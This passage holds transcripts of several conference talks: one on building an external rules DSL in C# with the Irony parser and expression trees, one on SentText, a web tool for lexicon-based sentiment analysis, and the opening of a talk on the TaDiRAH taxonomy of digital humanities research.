branches coming off them. Terminals are things like: well, here's my number, that's a thing; here's a string literal, that's a thing as well.
I also have, just for convenience's sake, a left parenthesis and a right parenthesis, the not operator, the comma — I actually have to tell my lexer-parser about all of these things for it to do anything with them. These tools start with a completely blank slate; they won't assume anything about the text you feed in, you have to tell them absolutely everything. So we have to teach it about commas, logical operators, all those kinds of things. Here's an interesting one: we say a unary operator is a plus, a minus, or a not. What Irony is doing here is overloading the operators — operator overloading is another C# feature we get to use — so I can literally write that a unary operator is plus or minus or not. And a binary operator is again plus, minus, multiplication, division, modulus, the bitwise operators, the logical operators, and then and and or — I guess those are still logical operators. So here I'm just teaching it what these things are. Once I've defined these operators, any time in the rest of my language definition I want to say "this can be a binary operator", I just reference that binaryOperator object, without having to list out all the operators again. The other thing to notice is that I'm in C# — so Irony itself is an internal DSL that I'm using to build external DSLs; I'll be feeding raw text into this to parse it and get something out the other side. Now that we have the terminals, which are the things that end, the non-terminals are things like dates, expressions, function calls, logical functions, and some more functions further down, and here I'm just declaring them so I can refer to them later. You'll also notice that for some of these I give them custom node types, to say: when you parse something that matches this, instantiate this specific node type in my abstract syntax tree instead of some generic node. That gives me, for example, a tuple node, where I have something easy to refer to like the inner expression, or a binary expression node where I have the left, the right, and the operator. If I only had the base node that comes with Irony, I'd just have a collection of child nodes to reason about every single time I walk the tree; with my custom nodes I can refer to very specific, targeted things instead of having to remember that, oh, it's the second child node of the first one, that's the right one. So I've declared a bunch of variables for the names of my non-terminals, and now that I've built up my terminals and non-terminals, I start to define the rules behind them. Looking at expression: its rule is a terminal, a unary expression, or a binary expression — one of those three things. Now notice that this starts to look very similar to the SQL EBNF text we saw earlier — expression was this, or this, or this one — it even has the little pipe symbol to say "or".
So this is just a helpful thing we found with Irony: it uses operator overloading in C# to give you something that looks a lot like what people actually write in those Extended Backus-Naur Form documents. And what we do is simply assign the rules for all the different pieces of the puzzle. The expression rule is what I showed; the expression list rule is the self-referential one that says an expression list is an expression list, comma, another expression — which lets me have an arbitrary number of comma-separated expressions. Then I define my literals. For dates and Booleans we had to tell it: when you recognize this text, this is how you treat it as a date. For us, a date is the text "date", plus a left parenthesis, plus a string literal, plus a right parenthesis. We could have done anything here — enclosed it in pound signs, dollar signs, quotes — we just wanted something unique that says this is how you write a date, and in our case it's the word date with a string inside parentheses that gets parsed into a real date. Boolean is just the text true or false, and null is of course the text null. We keep going down: the terminal rule is any one of the terminals we defined before; a tuple is a left parenthesis, any expression, and a right parenthesis; and the binary rule is an expression, some binary operator, and another expression. So it becomes very simple to define what we're building, because anyone who comes along later and reads this can fairly easily understand the rules we're defining for our expressions. I keep going and build out functions: a function call is a logic function, a math function or a string function; a logic function is one of two, IIF — which it turns out means inline if — and inline case, so if you want an if statement right inside an expression, you can have that. For math I have three: power, min and max, and for strings I've got four, just picked at random. Once I've declared my functions, I define what they actually look like: the inline-if function is the text IIF, then a left parenthesis, expression, comma, expression, comma, expression, right parenthesis. What's nice is that this inner "expression" is the rule I defined elsewhere, so whatever matches an expression works there — another function call, adding two numbers, it doesn't matter; as long as it matches the expression rule, it fits. That's a really nice thing about parsers and lexers: because definitions can reference themselves, you get these recursive, arbitrarily complex pieces for free. So I go on and define all my functions. One special thing I do is allow referencing a property on an object — remember the example where age is greater than five? For us, that looks like a dollar sign followed by a field name.
And our field name: Irony has a pre-built definition of what an identifier looks like — it already knows the rules for a C# identifier — so I just say the field name is that built-in identifier terminal, and then all I need is a dollar sign plus a field name and I'm good. I have another one, the today rule: if they want the current date — effectively DateTime.Now, or just whatever the current date is — they type pound, curly brace, today, and it matches and does the right thing. The last piece is defining some grammar metadata for the parsing rules. One of the things Irony does that tools like ANTLR do not do very well is operator precedence. In the States, anyway, the mnemonic was "please excuse my dear Aunt Sally" to remember what order operators are supposed to be executed in — I don't know what they do in other places, but that's what we had to learn — and of course we have to extend that beyond parentheses and the mathematical operators to all the Boolean ones as well. This is actually really hard to do in ANTLR; there's no built-in way to say, here's the order of my operators, figure it out. In Irony we do have a really easy way of saying, here's the order to execute the operators in. The last thing we have is the punctuation — the last important part, anyway. If I do nothing, all the punctuation comes through as nodes in my tree, and I don't care about commas showing up in the tree when I parse it; I just want a binary node that represents add with the two numbers. If I didn't tell it about the punctuation, it would include those in the tree I walk through, and I don't really want that, so this step says: remove those from whatever you parse. With other lexer-parser tools like ANTLR and yacc this is a separate step — the lexing and parsing are split, and there's a pass where these kinds of nodes get removed — because things like debuggers do care about whitespace and about those commas and such. So those tools have a two-step process: parse everything, including the whitespace, and then a second step that strips it out to give you something more reasonable to work with — the commas, the parentheses, all that kind of stuff gone. With our tool I don't care about having a two-step process, I just care about the end result, so that's what I'm doing here. The very last thing I have to do is set the root of the grammar to the expression definition — that's where parsing starts.
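Pulling those pieces together, here is a minimal sketch of what such an Irony grammar can look like. It is deliberately much smaller than the grammar described in the talk (no dates, functions or custom AST node types), and the names are illustrative, but the building blocks — terminals, non-terminals, rules built with the overloaded | and + operators, RegisterOperators, MarkPunctuation and Root — are Irony's API as I understand it:

```csharp
using Irony.Parsing;

// A stripped-down expression grammar in the spirit of the one described above.
public class MiniExpressionGrammar : Grammar
{
    public MiniExpressionGrammar()
    {
        // Terminals: the leaves of the tree.
        var number     = new NumberLiteral("number");
        var stringLit  = new StringLiteral("string", "'");   // single-quoted strings
        var identifier = new IdentifierTerminal("identifier");

        // Non-terminals: nodes that branch.
        var expression = new NonTerminal("expression");
        var binaryExpr = new NonTerminal("binaryExpression");
        var parenExpr  = new NonTerminal("parenExpression");
        var fieldRef   = new NonTerminal("fieldRef");
        var binaryOp   = new NonTerminal("binaryOperator");

        // Rules, written with Irony's overloaded | and + operators.
        binaryOp.Rule   = ToTerm("+") | "-" | "*" | "/" | ">" | "<" | "=" | "and" | "or";
        fieldRef.Rule   = ToTerm("$") + identifier;               // e.g. $Age
        parenExpr.Rule  = ToTerm("(") + expression + ")";
        binaryExpr.Rule = expression + binaryOp + expression;
        expression.Rule = number | stringLit | fieldRef | parenExpr | binaryExpr;

        // Precedence (lowest to highest) so 1 + 2 * 3 parses as expected.
        RegisterOperators(1, "or");
        RegisterOperators(2, "and");
        RegisterOperators(3, ">", "<", "=");
        RegisterOperators(4, "+", "-");
        RegisterOperators(5, "*", "/");

        // Keep the parentheses and the dollar sign out of the resulting tree.
        MarkPunctuation("(", ")", "$");

        Root = expression;
    }
}
```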
So let's see how this might work — how do we actually use Irony to execute something? I have a unit test, of course; everyone's supposed to test, right? The first step is just to instantiate the CustomDslGrammar class we built. At this point that object is only the definition of the grammar; to actually parse with it, Irony needs a two-step setup. First I create a LanguageData object from the grammar — I don't know why, but I have to, so there it is — and then I create an instance of a Parser based on that LanguageData. Internally, this is where all the optimizations happen for evaluating those rules: the grammar is just a definition, and you can imagine the code needed to actually parse against it is pretty complicated, so those two steps do all the behind-the-scenes work. External tools like ANTLR and yacc actually do code generation — when we looked at them, they were generating C# or Java code that is the actual parser, and it was horribly ugly to look at — and we didn't want that extra step of generating and compiling something. With Irony it's already in the language I'm working with, so, bonus. The last piece we have is our C# expression builder. I'll dig into it in a second, but this is the magic that takes the tree and builds executable C# code from it. So, a simple example: I pass in a string and want to do something with it. On the first line I parse — I am a string, in single quotes, because our grammar told it that string literals are enclosed in single quotes. That gives me a tree object, and from that tree I can look at things like whether it has any errors, whether there are any messages, what the child nodes are — all of that comes back from the tree object. Part of it as well is the individual AST node that I then go and work with. Let me debug this just to show what the tree looks like. Looking at the tree, the root is a node; it doesn't have any child nodes — first child, last child, I don't know why those blow up in the debugger, but they just do — and finally, down here, the actual value is my AST node: it's a literal node and the value is "I am a string". So it actually used one of our custom node types. The reason we have those is that the regular node that comes with Irony is really hard to work with, and we want something a bit easier when we're actually executing code. At this point I just have a tree of objects, and what I want is to go one step further and get a function. This thing here is just a delegate, a Func object: it takes no arguments and gives me back an object, and that's all it is. I gave it a tree and it gave me back an actual function I can execute, and that's what we do on the very last line: func, parentheses, parentheses — actually executing the function. And notice the result is the value I am a string, but without the single quotes, because the result of evaluating that string literal is a string, not a string with quotes in it. Does that make sense? It'll make more sense with something like add, say 1 plus 2.
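As a sketch of that wiring — the grammar here is the mini version from the earlier sketch (or the talk's CustomDslGrammar), and DslCompiler.BuildDelegate is a hypothetical stand-in for the talk's expression-builder class, whose internals are sketched later — the flow looks roughly like this:

```csharp
using System;
using Irony.Parsing;

public static class DslRunner
{
    public static void Main()
    {
        // 1. The grammar is just a definition...
        var grammar = new MiniExpressionGrammar();

        // 2. ...which Irony turns into the data and machinery that can parse.
        var language = new LanguageData(grammar);
        var parser   = new Parser(language);

        // 3. Parse the raw user text into a tree.
        ParseTree tree = parser.Parse("1 + 2");
        if (tree.HasErrors())
        {
            foreach (var message in tree.ParserMessages)
                Console.WriteLine(message.Message);
            return;
        }

        // 4. Hand the tree to an expression builder that produces a compiled
        //    delegate -- a stand-in name for the talk's builder class; a
        //    simplified sketch of such a builder appears further below.
        Func<object> func = DslCompiler.BuildDelegate(tree.Root);

        Console.WriteLine(func());   // 3
    }
}
```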
And when I execute the func here, the result is three — the number three, not the string three. And just to make sure I'm not pulling any punches, I'll run it — and yes, it passes. Now, our customers aren't asking for custom calculators; they have calculators on their phones and in Windows, all that stuff. What they really want is to execute custom rules, and they want to execute them against things defined in their model — in this case, people. They want to write arbitrary rules like: if this person is in this country, at that age, and has spent this much money in the past year on whatever, then they match the rule and we send them some custom marketing email. But to do that, they have to be able to reference members on that object, and our idea was the little dollar sign to represent accessing a property. We could have done whatever we wanted — brackets would probably have made more sense given SQL — but in our case we just went with the dollar sign. Okay, so I parse: dollar bar is greater than five. Let's debug this one to see what tree pops out on the other side. The tree now has very specific information in it: the root is a binary expression, so right away we see a binary expression node representing the greater-than. Inside it, the root AST node is the greater-than operator, and notice it has left, operator and right — because we defined that custom node representing left, operator, right. The left side says it's an object property, and the right side says it's the number five. If I dig into the left, the node tells me the variable name is bar — I defined a custom node that represents an object property and, as part of that, exposes the property name it's accessing, which in this case is bar. So I've got a tree representing the result of parsing that: the binary greater-than node, the left-hand side being the dollar bar, and the right-hand side being a number. What I want now is to build a function out of that which I can dynamically execute against any Foo object. Foo is a class up here with a property called Bar — highly inventive, I know. And I have two instances: one that's invalid for my rule of bar greater than five, with Bar equal to four, and one that's valid, with Bar equal to six. Now I can execute that same function against both, the invalid one and the valid one: for the invalid one it's false, and for the valid one it's true. The same exact function — I'm not recompiling anything, I'm not going through any fancy text-to-C# compiler — it's just taking my tree and building something else on the other side, this C# expression tree.
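Roughly, the expression tree being built for $Bar > 5 looks like the following. The Foo class and the demo wrapper are made up to mirror the talk's example; the Expression calls themselves are the standard System.Linq.Expressions API:

```csharp
using System;
using System.Linq.Expressions;

public class Foo
{
    public int Bar { get; set; }
}

public static class RuleDemo
{
    public static void Main()
    {
        // "$Bar > 5" translated by hand into an expression tree:
        ParameterExpression foo = Expression.Parameter(typeof(Foo), "foo");
        Expression left  = Expression.Property(foo, "Bar");       // $Bar
        Expression right = Expression.Constant(5);                 // 5
        Expression body  = Expression.GreaterThan(left, right);    // $Bar > 5

        // Compile once into a reusable delegate...
        Func<Foo, bool> rule = Expression.Lambda<Func<Foo, bool>>(body, foo).Compile();

        // ...and evaluate it against different instances without recompiling.
        Console.WriteLine(rule(new Foo { Bar = 4 }));   // False
        Console.WriteLine(rule(new Foo { Bar = 6 }));   // True
    }
}
```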
The same function executed twice, two different results, based on whatever object I pass into it. So really, the magic here is this: it's fairly easy to build a tree of things, but it's another thing entirely to take that tree and build dynamically executable code from it. How hard that is depends on your language and platform. In Ruby it's easier; in Java I have no idea; in C# it's possible in most cases, and hopefully it's getting easier — I think there's a talk today as well on Roslyn, the compiler-as-a-service tooling Microsoft is putting out. So depending on your language, it can be easier or harder to do. Anyone here a Ruby person? Anyone heard of Cucumber? It uses a very similar concept: you parse the text, it goes into some intermediate format, and then you use that to execute code based on what was defined there. Okay. In C#, if I want to dynamically create custom functions on the fly, I have a few options. Some are harder and some are easier — actually, they're all pretty hard and annoying, but some are more annoying than others. The hardest way would be to take the text I typed in and somehow compile it with the C# compiler — just load up the compiler and compile it. But in this case I don't have a whole program, just a little snippet of text: there's no class, no method, so it's really hard to use the C# compiler, because it's not a full, valid C# program, it's a single tiny expression. Part of what C# introduced with LINQ, language-integrated query, was the ability to build expression trees. All the from, where, select stuff that came in C# 3 required being able to take what looks almost like SQL and parse it into what's known as an expression tree. And that's exactly what we're using here. I don't think it was necessarily intended for this use, but people grabbed hold of it and started using it to dynamically build custom functions. So I could, for example, change the rule on the fly to less-than, and now it's backwards — the test no longer passes, because what was invalid is now valid — and there's no code generation happening to make that work; behind the scenes it's building up expression trees. This is probably the most obtuse part of the whole code base, just because expression trees are very obtuse. If you want to build an expression tree in C#, you basically start with the Expression class, which has a number of factory methods for building nodes in the tree. You can see a bunch of them defined here, and this is only part of the A's: Add, AddAssign, AddChecked; the logical ones; and — a legacy of the VB days — AndAlso, which is different from And, by the way, because one short-circuits and one does not. If anyone here knows VB, you'll know what I'm talking about; if you don't, you really should check it out. Then there's ArrayAccess and ArrayIndex, and so on — all of these represent some kind of operation I can do in C#.
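The distinction the next part of the talk relies on is between an ordinary delegate and an expression tree built from the same lambda syntax. A small sketch of that difference — the types are standard .NET, the lambda body is arbitrary:

```csharp
using System;
using System.Linq.Expressions;

public static class DelegateVsExpression
{
    public static void Main()
    {
        // An ordinary delegate: the lambda body is compiled into IL right here.
        Func<int, object> asDelegate = x => x + 1;

        // The same lambda assigned to Expression<Func<...>>: the compiler instead
        // builds a tree of Expression objects describing "x + 1".
        Expression<Func<int, object>> asTree = x => (object)(x + 1);

        // The tree can be inspected, translated (e.g. to SQL)... or compiled at runtime.
        Func<int, object> compiled = asTree.Compile();

        Console.WriteLine(asDelegate(41));  // 42
        Console.WriteLine(compiled(41));    // 42
    }
}
```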
And these are all just factory methods building up expression objects — each node is an Expression object I can do something with. One of the other things they give you is the ability to take an expression tree you've built and dynamically compile a function from it. Down here I define an expression that represents a lambda — a Func taking something in and returning an object. That's equivalent to writing a Func<T, object> that takes some T and returns, I don't know, its Bar — a function I could execute right away. But C# also has the ability to create these as expression trees: if I change the type to Expression<Func<T, object>>, then instead of an anonymous delegate compiled inline, it's actually just a tree of objects being created. And if I want to execute that function at runtime, I call Compile on it, which returns a Func I can then use, and at that point I can execute it against some T object and do something with the result. So that's all we're doing here: taking the tree that was built by the lexer-parser, turning it into a C# expression tree, compiling it, and executing it. In this case there's a try/catch around it, so if anything throws, it just returns the exception. This is the real magic step: starting from the root node, it works through all the different node types in my system and translates each one into the equivalent C# expression tree node. A nil node — null — becomes Expression.Constant for null. A Boolean node becomes Expression.Constant for whatever Boolean value we have. Same with dates: Expression.Constant with the date value. And we just go on down the list. Functions are a little bit funny — there are ways in expression trees to call custom functions — but the idea is the same: because we have a tree on the left, we can build a tree on the right. We just recursively walk down one tree and build up the other, and at the very end we say, okay, we're done, compile it, and now I have something to work with. So in the final application, the flow looks like this: I parse the raw text and get a tree back. I have some very simple handling that says, if there are errors, then report, oh, you have errors. I then pull out the root node, instantiate my builder, and say: build me a function that takes a person, returns an object, and is dynamically compiled from whatever text the user typed in. That function I can execute directly: I call func, pass in a person object, and the result is a Boolean value I can use — if it's a match, do this, if not, do the other thing. And — still have it running, there we go — that's how we get this very dynamic behavior. I can say: first name is this, or last name equals Doe. Now, this one might evaluate to a match just because the order of operations isn't what I intended, so we may want to say, age is greater than five and then these other two conditions.
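A heavily simplified sketch of that recursive translation step is below. It works over the hypothetical AST node classes from the earlier sketch rather than Irony's real parse-tree nodes, and it only handles literals and a few binary operators, but it shows the shape of the "walk one tree, build the other" idea:

```csharp
using System;
using System.Linq.Expressions;

public static class ExpressionTreeBuilder
{
    // Translate one AST node (from the earlier sketch) into a C# Expression node.
    public static Expression Translate(AstNode node, ParameterExpression target)
    {
        switch (node)
        {
            case LiteralNode lit:
                return Expression.Constant(lit.Value);

            case BinaryNode bin:
                var left  = Translate(bin.Left, target);
                var right = Translate(bin.Right, target);
                return bin.Op switch
                {
                    "+"   => Expression.Add(left, right),
                    "*"   => Expression.Multiply(left, right),
                    ">"   => Expression.GreaterThan(left, right),
                    "and" => Expression.AndAlso(left, right),
                    "or"  => Expression.OrElse(left, right),
                    _     => throw new NotSupportedException(bin.Op)
                };

            // A fuller builder would also handle a field-reference node ($Age)
            // here, by returning Expression.Property(target, fieldName) --
            // which is why the target parameter is threaded through.
            default:
                throw new NotSupportedException(node.GetType().Name);
        }
    }

    // Compile the whole tree into a delegate that evaluates it against a T instance.
    public static Func<T, object> Build<T>(AstNode root)
    {
        var parameter = Expression.Parameter(typeof(T), "target");
        var body      = Expression.Convert(Translate(root, parameter), typeof(object));
        return Expression.Lambda<Func<T, object>>(body, parameter).Compile();
    }
}
```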
And now if I say John Smith, this will evaluate to match — but without the parentheses, of course. Oh, wait. How about Jane? Jane Doe. That makes more sense. Age greater than five, and first name is John. Oh, so the and gets evaluated first and then the other one. So, yes. That makes sense. So the user can type in any arbitrary expression here. It doesn't matter how complex it is. If I want to put in 50,000 parentheses on one side and 50,000 on the other side, it's able to handle that just fine. Any complexity inside there they want, they can have now. Whereas if I had to design a user interface behind this, it would just be the ugliest user interface ever. And I've seen people try to do that, and it's just never come out well. So if I want to be able to have the user just type in anything — and text is the right way to go there — then building an external DSL to be able to parse it, take it, and execute it is really the only option that will please the end user and also give me something on my side that I can actually maintain. So if you want more information on domain-specific languages, here are a couple of really good resources that I highly recommend. The one on the left is a general one about domain-specific languages by Martin Fowler and Rebecca Parsons. It talks about the patterns of domain-specific languages — internal ones, external ones, the different patterns you find in there, the different terms, and things like that. But it doesn't really tell you how to build something. So that's what I use the other one for. The ANTLR reference is also a really good one. The first half of the book is really good at describing the kinds of things you need to worry about if you're designing something that needs to be parsed. And the second half of the book is, okay, here's how you do it with ANTLR. So if you want to use ANTLR, great book; if you don't want to use it, also a great book — just stop reading about halfway through. So with our external DSLs, we were able to give an awesome user experience to the end user. They can type in whatever they want, they get something Excel-like — they can do calculations and things like that. We didn't have to design some crazy user interface to have them drag and drop operators and things like that. They got the raw text they wanted. And we were able to fulfill that inevitability that any enterprise system eventually will have a rules engine. So we were able to have our custom rules engine by using external DSLs to allow the user to type in whatever they want and have it execute dynamic C# or SQL code on the other side. So if you all have any questions, we'll be hanging around afterwards. Otherwise, thank you very much. Thank you.
We've all seen the explosion of fluent interfaces and internal DSLs with the language-oriented features of recent releases of C#. Dynamic languages extend the boundaries even further, where we can bend the programming languages to our will. But what if we want to move beyond the barriers of the programming language and into actual external, executable DSLs? In this session, we'll look at the landscape of lexers, parsers, grammars and trees to see how we can use these tools to build external DSLs that business users will actually enjoy using. We'll also look at how we can take those trees and transform them into real, executable code. Finally, we'll see where to use external DSLs (and where not to use them) to build systems with truly dynamic behavior.
10.5446/52968 (DOI)
I hope everyone sees my slide. I will gently switch to English, as you hear. Do you see my slides? Okay. So, my name is Thomas Schmidt from the Media Informatics Group of the University of Regensburg, and I will present SentText, a tool for lexicon-based sentiment analysis in the digital humanities. As was already said, Johanna Dangel was the primary developer of this tool, and Christian Wolff is the supervisor of the thesis that is connected to this tool development. And yes, this is originally a demo slash short paper contribution. So I will talk a little bit about the background and how we approached this tool development, but I will mainly focus on showing the tool by using it. So I will start with a little bit of background about sentiment analysis. Here you see just a standard definition of sentiment analysis: also called opinion mining, it is the field of study that analyzes people's opinions, sentiments, appraisals, attitudes and emotions, mostly in written text. Overall, the idea of sentiment analysis is to try to predict the expressed sentiment in a text unit — whether it's rather positive or rather negative, rather neutral or something like mixed. And that's the basic premise of this method. It has become a rather popular method in recent years in the text mining community and in information science in general, and it is applied in various research areas like social media analysis, analysis of product reviews, sentiment analysis on Twitter, and similar research branches. If you were to approach sentiment analysis nowadays, the state-of-the-art idea would probably be to use some sort of large pre-annotated corpus with sentiment annotations. For example, if you want to do Twitter sentiment analysis, there are a lot of large Twitter corpora with annotated sentiment per tweet. You would use these as a training corpus and then apply some machine learning algorithm to train a model, nowadays probably with something like a large word embedding model like BERT or similar. Of course, not every topic and not every research area has large chunks of annotated corpora. And especially nowadays, the modern machine learning approaches are not as transparent as other methods. So there's also another still very popular method, which is a little bit simpler: lexicon-based methods. This is also what is still kind of popular in the DH community, due to some sort of lack of annotated corpora, although there are developments that are going more in the direction of machine learning. Shortly about lexicon-based approaches in sentiment analysis, because this is the main idea of our tool: it's a rather simple concept. Instead of having a pre-annotated corpus, you have a pre-annotated list of words, so-called sentiment-bearing words, which are annotated concerning their sentiment polarity — whether a word is rather positive or negative in its general usage. This can be a number like plus one or minus one, or it can be on some metric scale, and you use these lists, which are created in various ways, sometimes expert-based, sometimes by some sort of semi-automatic process. And then you perform rather trivial calculations for a text unit. Here's just a very simple example. You simply count the words you detect as positive, you count the words you detect as negative, and then you perform some basic mathematical calculations to get an overall value of the polarity, the expressed valence of the text.
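As a minimal illustration of that calculation — not SentText's actual implementation; the tiny lexicon and the normalization choice here are invented for the example — a lexicon-based polarity score might be computed like this in Python:

```python
# Toy polarity lexicon: word -> polarity value (invented for illustration).
LEXICON = {
    "good": 1.0, "great": 1.0, "love": 0.7,
    "bad": -1.0, "terrible": -1.0, "hate": -0.7,
}

def polarity(text: str) -> float:
    """Sum the polarity values of all detected lexicon words and normalize
    by the number of tokens, so documents of different lengths stay comparable."""
    tokens = [t.strip(".,!?;:") for t in text.lower().split()]
    score = sum(LEXICON.get(tok, 0.0) for tok in tokens)
    return score / len(tokens) if tokens else 0.0

print(polarity("I love this great movie"))    # > 0, rather positive
print(polarity("what a terrible, bad day"))   # < 0, rather negative
```

Real lexicons are of course much larger than this toy one.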
Of course, there are some approaches to perform this in a more sophisticated way. You can try to look at negation words. You can try to look at valence intensifiers. You can perform lemmatization to improve this. But the overall premise is a basic calculation over the words detected in the text. As I already mentioned, due to the lack of corpora, and because it's very transparent and very easy to perform, for a long time in the DH context lexicon-based approaches were the approach to use when performing sentiment analysis. Some examples of what people are doing: they are, for example, looking at the most negative sentiment words used in plays by Shakespeare, for example here in Hamlet. They look at relationships between characters. This is a graph that visualizes the accumulated sentiment in speeches expressed by a specific character in a Shakespeare play — Othello towards Desdemona. You can see in the visualization that the accumulated sentiment becomes more and more negative, which is in line with the actual content of the play. Similar things have also been explored in various other areas that are close to the digital humanities, like literary studies, but also for historical language and other research areas. The ideas are the same. We also contributed to this branch of research. We explored lexicon-based sentiment analysis for another tool we developed for quantitative drama analysis, which I will shamelessly plug here. In this specific case, we performed lexicon-based sentiment analysis on plays by Lessing, we evaluated approaches, and we explored visualizations. We developed a web tool to explore sentiment analysis in Lessing's plays — a tool that performs analyses like this and produces visualizations like this. This is, for example, a bar graph visualizing how the sentiment becomes more and more negative in a play by Lessing. This is something you can identify in all of these plays. And we developed a lot of visualizations for this method. But as we did this and as more users used the tool and gave us feedback on what is interesting and so on, the feedback we received went more and more in the direction that people wanted to perform their own lexicon-based sentiment analysis. And people also wanted to have more transparency about how these results actually came about. So we saw a lack of tools in this context, and we decided to actually develop such a tool that people could use to perform their own lexicon-based sentiment analysis. The idea was to focus primarily on the DH community. We wanted to make it as accessible as possible. My impression is that tools that need a lot of installation and a lot of dependencies are not used as frequently as tools that are more accessible, like web tools. And we also wanted to give some transparency about how the calculations come about. We also applied some methods of the user-centered design process. We performed a requirements analysis and integrated methods of usability engineering. For example, we performed interviews with a couple of people from the DH context, but also with literary scholars. We performed some usability tests to gain feedback and to develop a tool that is as well adapted as possible to the specific community we are designing it for. I will not go into detail on all of these methods since I really want to show the tool. Just some of the requirements we acquired via this process are shown here. As I already said, people wanted to primarily use their own material.
They wanted to adjust lexicons. As you can imagine, text sorts in DH are not really contemporary language. Most of the time it's historical language or other domain-specific language, and people wanted to adjust for this. They wanted transparent results. And the web is seen as a very accessible platform to use, which of course also causes a lot of problems, but this is the idea we followed here. So I summarized some of the overall functionality. We do perform some advanced things with our tool, like lemmatization and negation handling. Right now everything is focused on German, but we plan to extend this to other languages as well. But instead of talking about the functionality, I will actually show the tool with a live demo. And it will actually also be the first time that I explore this specific text. As you already know, in IT, nothing can go wrong with a live demo. So let's look at the tool. I hope you all see my browser now. Can you give me short feedback? Okay. So this is the start page of SentText. We integrated a lot of documentation and explanation, as we have already made the experience that people are very interested in all of this, and there we explain the different pre-processing steps, what types of data you can upload, what you can download, and so on. If you go to the sentiment analysis branch of the tool, you can then indeed upload your files and perform sentiment analysis. We offer some basic German sentiment lexicons, but there's also the possibility to upload your own lexicon if you follow a specific data standard — a rather simple standard that you can read more about in the documentation of the tool. Among the advanced options, as I already said, we can perform lemmatization with a German lemmatizer, though the process is very time-consuming. Again, since we are on the web, performance is a thing, so to speak. You also have some other adjustment possibilities, like a stop word list, and you can use negations and shifters and so on. So I looked for an interesting example where I hoped to find some interesting results for state-of-the-art research, so to speak, and what we will do is compare German rap lyrics with German Schlager lyrics. I looked a lot for an English word for Schlager, but I didn't find anything; it seems to just be German Schlager. And now I will perform the sentiment analysis. This might take a little time, so of course I prepared this beforehand, just to give you an insight into how it looks. This corpus is basically a list of lyrics from various artists of the rap or Schlager genre. I don't know much about rap, but I have some artists here — yes, some well-known German Schlager artists. Not super representative, but of course I just want to show how the tool is applied. So please, this is not a study about German lyrics or anything like that. Nevertheless, if you perform the analysis, what you get is a screen like this. On the left, in this specific case, the entire corpus of rap lyrics and the entire corpus of Schlager lyrics are each seen as one document, so to speak. So we just compare one document to the other. You can of course import more documents and then create so-called folders to compare document collections to each other. We will just focus on this one setup. We currently look at the Schlager results. You get a normalized score. It's always very small, since it is normalized by the number of tokens, which helps to compare documents of different sizes.
But nevertheless, the overall impression is indeed that the Schlager texts actually look less negative than the rap texts, although the difference is quite small. You get some visualizations that you can look at — for example, a pie chart of the detected negative words and the detected positive words. You can look at the strongest sentiment-bearing words. This is just for Schlager in this example. So these are the very positive words that are most frequently used in Schlager, and these are the most negative words used in Schlager. The word Hölle — I think there is one very specific song that is the reason for this result here. And you can explore other analyses. We also try to connect this with a little bit of close reading, which is actually something where we found out that users really like to explore how the sentiment analysis actually works. In the text view on the right, you can explore your document and look at the specific words that are detected and what sentiment value they actually have. So this is actually the part that people often go into and look at: okay, a wrong word was detected, this word shouldn't be positive, and so on. Some of the word assignments seem intuitive and some do not. I was looking a bit for an example where negation comes into play, but I'm not sure if I can find one off the top of my head. If a negation word is close to a sentiment-bearing word, the valence gets flipped into the other polarity. Yes — but this is something that people actually quite like. You can also compare documents with each other. In this case, we would compare rap to Schlager, for example. If I want to compare the most negative words in Schlager and the most negative words in rap, you can look at something like this and get an overall impression of what is happening, and I would argue that some of the results here are already telling of the specific genre. Of course, you can also look at this from a more quantitative standpoint, at the specific word distribution. You would see here that there are indeed more negative words in rap — 46 percent — than in Schlager, which is apparently a bit more positive, according to this specific method and all the limitations that are connected to it. Yes, so I have all the links in my presentation, and I will also share the presentation later on. Of course, you also find all the links to the tool and so on in the paper, so you can explore the tool. That's always the most fun with tools — to explore them yourself. We also performed a usability test. I will try to go back to the slides here. I hope you all see my slides again now. It was a rather small usability test, but the feedback was rather positive, with very good results. Of course, we had some sort of iterative development; the tool was constantly being improved. Overall, there are still a lot of missing features. Other than that, I'm rather glad the tool exists. It seems to be used rather often. The access numbers are surprisingly high — I don't know how these people always find the tool — and every now and then I receive some mails, and what people would still like the most is of course more lexicons and more languages: could you integrate something for Spanish, and so on. This is something to do. Of course, also some sort of user management. Right now, we basically save nothing from a user. We don't even save the text, so you can't save your overall dashboard.
You can save the PNGs and you can download some tables with the results. You can download an XML with your results, but you can't save your entire process, so to speak. Overall, since I'm also doing sentiment analysis with other methods, I would say that if you really want to do a rigorous scientific research project performing lexicon-based sentiment analysis, you usually need more control than this tool can offer, but I still think that the tool has its value. You can explore a text sort, get first results, get first insights, get a first understanding of your specific text and where it might be problematic. I also think this tool is very nice to use for educational purposes, just to show it to students so they can explore sentiment analysis as a method. If you want more information, the good friends at forTEXT created a very extensive tutorial for the tool that I can recommend if you want to get to know more. And other than this, I thank you for your attention. I thank Johanna for the great tool; her contact data is also here. I hope you had some fun with the talk. Thank you very much.
We present SentText, a web-based tool to perform and explore lexicon-based sentiment analysis on texts, specifically developed for the Digital Humanities (DH) community. The tool was developed integrating ideas of the user centered design process and we gathered requirements via semi-structured interviews. The tool offers the functionality to perform sentiment analysis with predefined sentiment lexicons or self-adjusted lexicons. Users can explore results of sentiment analysis via various visualizations like bar or pie charts and word clouds. It is also possible to analyze and compare collections of documents. Furthermore, we have added a close reading function enabling researchers to examine the applicability of sentiment lexicons for specific text sorts. We report upon the first usability tests with positive results. We argue that the tool is beneficial to explore lexicon-based sentiment analysis in the DH but can also be integrated in DH-teaching.
10.5446/52969 (DOI)
Thanks for the nice introduction and thanks for having us. In today's talk, we would like to provide some insights on the origins and the development of a taxonomy of research activities in the digital humanities called TaDiRAH. This is a cross-disciplinary case study of a collaborative initiative of information organization and access in the digital humanities. It includes insights on a far-reaching revision and formalization of the taxonomy. To give you an idea of what the revision was about, we will first take a look at the research landscape at the time and the context in which the taxonomy was created — the starting points of TaDiRAH version 1. We then turn to the innovations of version 2, in particular its conceptualization, discussion, publication and revisions, and take a look at future tasks. Finally, we will try to deduce a few more general remarks from our case study. So, version 1. The taxonomy that we built to help categorize digital humanities work is called TaDiRAH, which is a portmanteau blend of Taxonomy of Digital Research Activities in the Humanities. At the same time, the name reflects the acronyms of the initiatives that the taxonomy evolved from; you'll see that on the next slide. We did not have to build it up from scratch entirely. There was an ongoing interest in what the DH are, which built on some more generic thoughts, like Unsworth's scholarly primitives, which have already been mentioned this morning, or the methodological commons. However, while those reflect the interdisciplinarity of the digital humanities, they were rather general, theoretical considerations. It was about 10 years later that arts-humanities.net — maybe some of you still know it — at King's College provided a more structured approach for the DH domain. And that is where TaDiRAH could carry on 